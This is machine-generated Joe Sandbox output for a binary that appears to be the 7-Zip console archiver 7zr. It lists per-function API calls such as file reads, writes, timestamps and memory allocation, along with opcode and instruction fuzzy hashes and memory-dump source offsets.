                          • Instruction ID: d49edc6858842d4391d63f87ccfddd6c042c3bce3d2ab563495809e37d440fe9
                          • Opcode Fuzzy Hash: 2e86235dc800d6e25e4196365cd5e0ac348dc581110ab7437d625c6c1925ac4b
                          • Instruction Fuzzy Hash: 811173B1510B14DFC715EF64D945BCABBF4BF10344F00891CE4AA93591DBB0AA24CF80
                          APIs
                          • SetFileTime.KERNEL32(00000002,00000000,000000FF,00000000,00000000,80000000,00000000,?,00181AD1,00000000,00000002,00000002,?,00187B3E,?,00000000), ref: 00187AFD
                          Similarity
                          • API ID: FileTime
                          • String ID:
                          • API String ID: 1425588814-0
                          • Opcode ID: 2210a2539f3c975e4cbca4e29b832ea1ed3274663600ad1e779bd01ba009a4b7
                          • Instruction ID: 6d00865be4a7ddf0cf8d07abec14a7b5c035c670e7c3cb43ccaace5f7b55eee8
                          • Opcode Fuzzy Hash: 2210a2539f3c975e4cbca4e29b832ea1ed3274663600ad1e779bd01ba009a4b7
                          • Instruction Fuzzy Hash: D6018F30104248BFDF26AF54CC09BEE3FA59B15320F248149B8A9522E1C760DF61DB50
                          APIs
                          • __EH_prolog.LIBCMT ref: 001BC0B8
                            • Part of subcall function 001A7193: __EH_prolog.LIBCMT ref: 001A7198
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                          Similarity
                          • API ID: H_prolog$free
                          • String ID:
                          • API String ID: 2654054672-0
                          • Opcode ID: f9fda2276029604aa0e371b3d030ead22449a177573ada49cc6aac71abda7a5d
                          • Instruction ID: e524e59246960c2a1a7a91e0b8349a77b75ef23e7fd337d622f5535657cc4eff
                          • Opcode Fuzzy Hash: f9fda2276029604aa0e371b3d030ead22449a177573ada49cc6aac71abda7a5d
                          • Instruction Fuzzy Hash: DFF0B476A04612EBD726AF49E8817EEF3ADEF64760F10002FF41197601CBB19D118A90
                          APIs
                          • __EH_prolog.LIBCMT ref: 001C0364
                            • Part of subcall function 001C01C4: __EH_prolog.LIBCMT ref: 001C01C9
                            • Part of subcall function 001C0143: __EH_prolog.LIBCMT ref: 001C0148
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                            • Part of subcall function 001C03D8: __EH_prolog.LIBCMT ref: 001C03DD
                            • Part of subcall function 001C004A: __EH_prolog.LIBCMT ref: 001C004F
                          Similarity
                          • API ID: H_prolog$free
                          • String ID:
                          • API String ID: 2654054672-0
                          • Opcode ID: ecfacca03a0c402f15d9f618e57c9ecdeafe27de1cae9ec6143e3deb7b6b3e0a
                          • Instruction ID: c94737830fe18cf5b7a2ba5d81a9add994ce42872ab9960a825a1b07db513980
                          • Opcode Fuzzy Hash: ecfacca03a0c402f15d9f618e57c9ecdeafe27de1cae9ec6143e3deb7b6b3e0a
                          • Instruction Fuzzy Hash: 7DF0F431928B50EFCB1BFBA8D42279DBBE5AF28314F10465DE452632D2CBB49B048B45
                          APIs
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: e978cae0711129bea832a965eb647323f1369b31f444c3f62566b704b0aed170
                          • Instruction ID: 70e4d3c28fff522dbe1a6a658d57cc70d1502dd8dd5fab7bfc97caf87e6a55fc
                          • Opcode Fuzzy Hash: e978cae0711129bea832a965eb647323f1369b31f444c3f62566b704b0aed170
                          • Instruction Fuzzy Hash: AFF0C232E1011AEBCB14EF98D8409EFFB78FF58B50B10805AF415E7250CB348A01CB90
                          APIs
                          • __EH_prolog.LIBCMT ref: 001C550A
                            • Part of subcall function 001C4E8A: __EH_prolog.LIBCMT ref: 001C4E8F
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: ecf90fe317cd3ebda42984158fdce3f76c92a14b795cf9b01d0fe16f10cc05f2
                          • Instruction ID: db479a65935e33799b18707792893248663c3da2dbc07982621216836f07a994
                          • Opcode Fuzzy Hash: ecf90fe317cd3ebda42984158fdce3f76c92a14b795cf9b01d0fe16f10cc05f2
                          • Instruction Fuzzy Hash: 38F0ED32604914EBCB019F48E810FDE7BBAFF88360F11442EF80197202DBB1ED108BA0
                          APIs
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 3bcdf244f962b5dce5acd43427410b117b77e47b03c3331759c27d6d016c0ca7
                          • Instruction ID: efd603062670bd51a522d5f7ecc1b55c3c186877ba03a620179b310c178a203c
                          • Opcode Fuzzy Hash: 3bcdf244f962b5dce5acd43427410b117b77e47b03c3331759c27d6d016c0ca7
                          • Instruction Fuzzy Hash: 31E09276614108EFC704EF98D855F9EB7B8FF48354F10841EF00AD7201C7749910CA60
                          APIs
                          • __EH_prolog.LIBCMT ref: 001C5E30
                            • Part of subcall function 001C08B6: __aulldiv.LIBCMT ref: 001C093F
                            • Part of subcall function 0019DFC9: __EH_prolog.LIBCMT ref: 0019DFCE
                          Similarity
                          • API ID: H_prolog$__aulldiv
                          • String ID:
                          • API String ID: 604474441-0
                          • Opcode ID: 91ab924ef19d1edaf18f4ce68c87656598b506e90756dea8ad5dac2fc461167f
                          • Instruction ID: 5ca444f530bac1d0dcd9bc3da70afd08e549b7f190e76304e866582e702037d1
                          • Opcode Fuzzy Hash: 91ab924ef19d1edaf18f4ce68c87656598b506e90756dea8ad5dac2fc461167f
                          • Instruction Fuzzy Hash: 10E03970E11760DFCB55EFB8A54168EB6E4BB18700F00486EA046D3B41DBB4EA108B80
                          APIs
                          • __EH_prolog.LIBCMT ref: 001C8ED6
                            • Part of subcall function 001C9267: __EH_prolog.LIBCMT ref: 001C926C
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 37e88629698fbb47efc05a381660ef5079465f54249a6321c6b22f9a52f1a17a
                          • Instruction ID: 8309a092e5aeffdab7607575047bf0f761df0eb7a6d4e6c504640053e0035530
                          • Opcode Fuzzy Hash: 37e88629698fbb47efc05a381660ef5079465f54249a6321c6b22f9a52f1a17a
                          • Instruction Fuzzy Hash: 1DE09271A249249AC719EB64E522BDDB7E8EF24704F00065DA04392582CBB4A704C781
                          APIs
                          • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00187C8B
                          Similarity
                          • API ID: FileWrite
                          • String ID:
                          • API String ID: 3934441357-0
                          • Opcode ID: 82882a1bb41a98eae23c31bf52135a8a04054365341f65aa26dc08dc58c6ff5b
                          • Instruction ID: cdd2d5bccdc3f739d86cdc733a96989b1d6489c1569212b4508bbf6f1c9d971f
                          • Opcode Fuzzy Hash: 82882a1bb41a98eae23c31bf52135a8a04054365341f65aa26dc08dc58c6ff5b
                          • Instruction Fuzzy Hash: 0DE01A75600209FBCF11DFA5D801B8E7BB9EB09754F20C06AF9199A2A0D739DA50DF54
                          APIs
                          • __EH_prolog.LIBCMT ref: 001CBE6E
                            • Part of subcall function 001C5E2B: __EH_prolog.LIBCMT ref: 001C5E30
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 9544d5e055ff2a9dd1d3b4c86c2c2fa22ff09553d3f634d3d424f168f92e0e73
                          • Instruction ID: c3f86080af1e6e70ace1ec9619b7c9f8477e0199359e380f8ffd9797c978d815
                          • Opcode Fuzzy Hash: 9544d5e055ff2a9dd1d3b4c86c2c2fa22ff09553d3f634d3d424f168f92e0e73
                          • Instruction Fuzzy Hash: 81E09271A24A608BD315EB64D411BDDB7E8BB24308F00845EE0A6D3282CFB4AA04CBA5
                          APIs
                          Similarity
                          • API ID: fputs
                          • String ID:
                          • API String ID: 1795875747-0
                          • Opcode ID: ebe74f7f55567795f735203d7ef6b7c694407a0d349edd40f8dcc8eb7751935a
                          • Instruction ID: 3d40ebc9fd5e5e2a8d74b61156156b9f6b47988b5b4cb98e7dafd09c0ba09f7e
                          • Opcode Fuzzy Hash: ebe74f7f55567795f735203d7ef6b7c694407a0d349edd40f8dcc8eb7751935a
                          • Instruction Fuzzy Hash: 43D01232504119BBCF156BD4EC06CDD77BCEF1C214710441AF545E2150EAB5E6158B94
                          APIs
                          • __EH_prolog.LIBCMT ref: 001BF74A
                            • Part of subcall function 001BF784: __EH_prolog.LIBCMT ref: 001BF789
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 5795fae21379de16ec9658651472c0de4a5d6cf85c4176c53b5482aeb807bf03
                          • Instruction ID: 627858882263497d5794ea9f1d6a8bb2e3f4c76cc5eb7d75a205bf6e74c33547
                          • Opcode Fuzzy Hash: 5795fae21379de16ec9658651472c0de4a5d6cf85c4176c53b5482aeb807bf03
                          • Instruction Fuzzy Hash: 81D01272A25214BFD7149B85ED12BEEB778EB45758F10056EF00161141C7B55A008AA4
                          APIs
                          • ReadFile.KERNELBASE(00000002,?,?,00000000,00000000,00000002,?,0018785F,00000000,00004000,00000000,00000002,?,?,?), ref: 00187B65
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 9631491fde9e7e6ea9acdf78a050755c05b0090a67883a789b90e12a8705bc62
                          • Instruction ID: c239299a591ec959203f27aac313ed5e1b181bd62730bdbb0a51a7f3ef8ac0c7
                          • Opcode Fuzzy Hash: 9631491fde9e7e6ea9acdf78a050755c05b0090a67883a789b90e12a8705bc62
                          • Instruction Fuzzy Hash: E2E0EC75200208FBDF11CF90CC05F8E7BB9AF49754F208058E90596160C375AA64EB50
                          APIs
                          • __EH_prolog.LIBCMT ref: 001D80AF
                            • Part of subcall function 00181E0C: malloc.MSVCRT ref: 00181E1F
                            • Part of subcall function 00181E0C: _CxxThrowException.MSVCRT(?,00234B28), ref: 00181E39
                            • Part of subcall function 001CBDB5: __EH_prolog.LIBCMT ref: 001CBDBA
                          Similarity
                          • API ID: H_prolog$ExceptionThrowmalloc
                          • String ID:
                          • API String ID: 3744649731-0
                          • Opcode ID: 1f2d236f21c6dc569ccbb7d663fb15d6f5f430f4c78f50c6731a59c72cc8188e
                          • Instruction ID: b92caf321cf072d04d883154959fe4eae8c10dafbf4ac750bf4224e783669496
                          • Opcode Fuzzy Hash: 1f2d236f21c6dc569ccbb7d663fb15d6f5f430f4c78f50c6731a59c72cc8188e
                          • Instruction Fuzzy Hash: 23D05E71B19101AFCB48FFF8A4227AE72E4AB58704F00457EB016E3B81EF708A40CA20
                          APIs
                          • FindClose.KERNELBASE(00000000,?,00186880), ref: 00186853
                          Similarity
                          • API ID: CloseFind
                          • String ID:
                          • API String ID: 1863332320-0
                          • Opcode ID: 7c236243e3694b1257789af9791b24b2c7ed9a37c2e3098db1c3f373181db192
                          • Instruction ID: 2176cba3d7c0e136bdc60d7b8faa3f11d4d9c9d3cf0ba9c0da636fced2ad135a
                          • Opcode Fuzzy Hash: 7c236243e3694b1257789af9791b24b2c7ed9a37c2e3098db1c3f373181db192
                          • Instruction Fuzzy Hash: 60D01231104322568A746EBEB84DACA33D86F073343311B9AF0B8C31E2E7708C839B90
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs
                          • String ID:
                          • API String ID: 1795875747-0
                          • Opcode ID: fea3df79794c96f37c81a752945deb66d2e11ce22af72d1189e1b11d2ef1858c
                          • Instruction ID: 704891048db41c0a4ebb26635ab9063dcd73d5d24b5004f694254b1ea5887324
                          • Opcode Fuzzy Hash: fea3df79794c96f37c81a752945deb66d2e11ce22af72d1189e1b11d2ef1858c
                          • Instruction Fuzzy Hash: C8D0C936008251AF96266F45FC0AC8BBBA5FFE9320721082FF480921609B626925DAA0
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputc
                          • String ID:
                          • API String ID: 1992160199-0
                          • Opcode ID: fcb0f0c6683682f3a4765a2d7183d0284aa01f6eb55c18ca8c827e575a6828f9
                          • Instruction ID: 3a307d319253eca3491785465a2b01d2802a094b8b1752bba1d78413b0f92e05
                          • Opcode Fuzzy Hash: fcb0f0c6683682f3a4765a2d7183d0284aa01f6eb55c18ca8c827e575a6828f9
                          • Instruction Fuzzy Hash: AAB09232308220ABE6281A9CBC0AAC46794DF09732B21005BF548C21909AD11C924A95
                          APIs
                          • SetFileTime.KERNELBASE(?,?,?,?,00187C65,00000000,00000000,?,0018F238,?,?,?,?), ref: 00187C49
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: FileTime
                          • String ID:
                          • API String ID: 1425588814-0
                          • Opcode ID: 6d409fbec6c80678d7f14e8537d7e49c767ea5c51318ff63403587a3c09cc00e
                          • Instruction ID: 6932561cae0e0dcd38cd98ddacaa664fd65d5bae85579108fc10eacccbb9601f
                          • Opcode Fuzzy Hash: 6d409fbec6c80678d7f14e8537d7e49c767ea5c51318ff63403587a3c09cc00e
                          • Instruction Fuzzy Hash: 3AC04C36158105FF8F120FB0DC09C1EBBA2ABA5721F10D918F159C4070C7328034EB02
                          APIs
                          • SetEndOfFile.KERNELBASE(?,00187D81,?,?,?), ref: 00187D3E
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: File
                          • String ID:
                          • API String ID: 749574446-0
                          • Opcode ID: 1e94443a45401fda75c70370f7411daf3f8fa93ad6f0568fb3408b95a47a6294
                          • Instruction ID: 630d43fa548e149f685a786be026b4b877926f08a8b343791199ee983778fdf5
                          • Opcode Fuzzy Hash: 1e94443a45401fda75c70370f7411daf3f8fa93ad6f0568fb3408b95a47a6294
                          • Instruction Fuzzy Hash: 96A001702A511A9A8E211B74E80A8683AA1AA5260676026A4A006CA4B5DB22442AAA41
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: memmove
                          • String ID:
                          • API String ID: 2162964266-0
                          • Opcode ID: 905849044f7bb70ba3a2618bad9265f9938eed64f92d0b9ff9b5c0b646e76aab
                          • Instruction ID: 3ffcf6f4fc928064de1d31e20fa72b741dfe9da4f5e97631e03fa96f528848a6
                          • Opcode Fuzzy Hash: 905849044f7bb70ba3a2618bad9265f9938eed64f92d0b9ff9b5c0b646e76aab
                          • Instruction Fuzzy Hash: 17813D75E0424AAFDF14EFA8C4C4AAEBBB1AF48304F248469D511B7341D771AB84CFA4
                          APIs
                          • CloseHandle.KERNELBASE(00000000,00000000,00193D8D,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00193E12
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: CloseHandle
                          • String ID:
                          • API String ID: 2962429428-0
                          • Opcode ID: e891c519dec4ec0e7609db571c00871a535f4e7f0f999107b5fb833f3177b8f1
                          • Instruction ID: 4f8806291c792d4984e0e7a22b7be95a3bb15f6f81507da26bfe93ce833997ac
                          • Opcode Fuzzy Hash: e891c519dec4ec0e7609db571c00871a535f4e7f0f999107b5fb833f3177b8f1
                          • Instruction Fuzzy Hash: 77D0123151421157DF705E6CF8047D663DD6F10321B154459FC90DB144E764CCD35A90
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: malloc
                          • String ID:
                          • API String ID: 2803490479-0
                          • Opcode ID: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                          • Instruction ID: 2757cc4eeea973b47650a954494e72a27643a10b2c8220222e5c1838dcf30187
                          • Opcode Fuzzy Hash: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                          • Instruction Fuzzy Hash: 98D0C7E162270605DF484930494D76A31951F5032EB184578A816DA1D2E715C63A9554
                          APIs
                          • CloseHandle.KERNELBASE(00000000,?,001875AF,00000002,?,00000000,00000000), ref: 00187657
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: CloseHandle
                          • String ID:
                          • API String ID: 2962429428-0
                          • Opcode ID: 3e873e228669e67cdb43b3b4d99e58ea9b26fd09ccc4f7a68ae1d3fe63d44d58
                          • Instruction ID: 825a9ebb99d48f3838667cb80d691fd4d295a5d7a9e56aa567076f6d347bf25e
                          • Opcode Fuzzy Hash: 3e873e228669e67cdb43b3b4d99e58ea9b26fd09ccc4f7a68ae1d3fe63d44d58
                          • Instruction Fuzzy Hash: 92D0123110862256DA746E7C78499C633D85B123343711759F4B4D32E1E360CC834B90
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000), ref: 00206B31
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: b95f02947fbd0e695b441fafbc0aff9b7087aba38a71607ba13604d0c26b4f9e
                          • Instruction ID: d2d6dca0fc33a83db2d18845e3437b54fb3fa4354423e1b0417a3828edfa3eb5
                          • Opcode Fuzzy Hash: b95f02947fbd0e695b441fafbc0aff9b7087aba38a71607ba13604d0c26b4f9e
                          • Instruction Fuzzy Hash: 48C02BE1A4D280EFDF0213509C447603F309F83300F0A10C1E4046B0D3C2041D0DC723
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: malloc
                          • String ID:
                          • API String ID: 2803490479-0
                          • Opcode ID: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                          • Instruction ID: 9c3eb4c63f6b842fe5bb88bb9ba5f74c2a66581eee5a1577068098690090b573
                          • Opcode Fuzzy Hash: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                          • Instruction Fuzzy Hash: B5A024C553114101DF5C11303C05477104013703077C004FC7405C0103F715D1341005
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: malloc
                          • String ID:
                          • API String ID: 2803490479-0
                          • Opcode ID: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                          • Instruction ID: 1f2ef43fc62933aaa5015a805dd7b420e4de90dee8d0a76032b13f7a4723221a
                          • Opcode Fuzzy Hash: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                          • Instruction Fuzzy Hash: 33A012CDF2010101DE4421343805463105222F06057D4C474640440106FA14C0342002
                          APIs
                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00206BAC
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: FreeVirtual
                          • String ID:
                          • API String ID: 1263568516-0
                          • Opcode ID: e4372462c34d8f3353c38b865057496c1f7417cd48bfa8b3e4ae6338fc60f55c
                          • Instruction ID: 93c7641cb6e410016ade73dddf0493cd78161ba5f7b0077ee755c9d256995380
                          • Opcode Fuzzy Hash: e4372462c34d8f3353c38b865057496c1f7417cd48bfa8b3e4ae6338fc60f55c
                          • Instruction Fuzzy Hash: 7FA00278680700B7ED7067707D4FF5D37247780F45F3095447241690D05AE471459A9C
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                          • Instruction ID: 3cfedacb5744fa306b671ff396eba937baf4f31239e885b4b2b84a4c7af48fb0
                          • Opcode Fuzzy Hash: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                          • Instruction Fuzzy Hash:
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                          • Instruction ID: f025cc31fe52f18a413fe70b89e7f8aede4401e009fab4c69bb6ba53e29eb382
                          • Opcode Fuzzy Hash: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                          • Instruction Fuzzy Hash:
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 93b7a0df132c61880aa636f8c7c569c54a3bb63a57c73443a8fb180ff6bd50ff
                          • Instruction ID: 21da648b64908f45e09f42edfa3ba339df0d431cb89ee08e871603a51c48a1fc
                          • Opcode Fuzzy Hash: 93b7a0df132c61880aa636f8c7c569c54a3bb63a57c73443a8fb180ff6bd50ff
                          • Instruction Fuzzy Hash: E8A00271405201EBDA151B50FD0E48D7B61EF85627B315459F05B504718F314871BA01
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
